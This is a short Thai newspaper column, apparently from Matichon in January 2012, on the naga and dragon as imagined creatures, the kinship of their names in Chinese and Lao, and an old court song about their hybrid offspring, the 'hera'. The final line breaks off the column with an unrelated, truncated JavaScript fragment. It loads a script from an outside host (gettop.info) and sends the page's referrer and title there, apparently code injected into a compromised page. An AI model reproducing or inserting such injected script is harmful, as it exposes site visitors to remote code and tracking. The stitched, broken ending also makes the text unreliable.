มติชนรายวัน ฉบับประจำวันพุธที่ 11 มกราคม 2555

 

          นาค กับ มังกร เป็นสัตว์ที่คนโบราณสร้างขึ้นเองจากจินตนาการนับพันๆ ปีมาแล้ว ไม่เคยมีตัวเป็นๆ จริงๆ

          เมื่อสร้างขึ้นแล้วก็ผูกตำนานนิทานชักจูงให้คนทั่วไปเชื่อถือต่างๆ นานา คนส่วนมากก็เชื่อตามที่ถูกชักจูง

          นาคกับมังกรเป็นคำที่ไทยยืมจากตระกูลภาษาอินโด-ยุโรป แต่คำเก่าใช้เรียกสัตว์ในจินตนาการดังนี้

          จีน เรียก มังกร ว่า หลง, เล้ง ส่วนลาว เรียก นาค ว่า ลวง, หลง (ชื่อแม่น้ำกาหลงในท้าวฮุ่งและพระลอ)

          คำเหล่านี้ใกล้เคียงเป็นเครือญาติชาติภาษาจนเกือบเป็นคำเดียวกัน แสดงว่าเกี่ยวดอง เพราะอยู่ใกล้ชิดกัน

          จึงน่าจะเป็นเหตุให้คนดั้งเดิมเชื่อว่า นาค (ตัวผู้) กับ มังกร (ตัวเมีย) เคยสมสู่กัน จนมีลูกออกมาเรียก “เหรา” อ่านว่า เห-รา มีพยานอยู่ในเนื้อร้องมโหรีกรุงเก่า เพลง เห-รา ดังนี้

               เจ้าเห-ราเอย              รักแก้วข้าเอยเห-รา

          บิดานั้นนาคา                  มารดานั้นเป็นมังกร

          มีตีนทั้งสี่                        หน้ามีทั้งครีบทั้งหงอน

          เป็นทั้งนาคทั้งมังกร        เรียกชื่อว่าเห-ราเอย

 

} else {s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;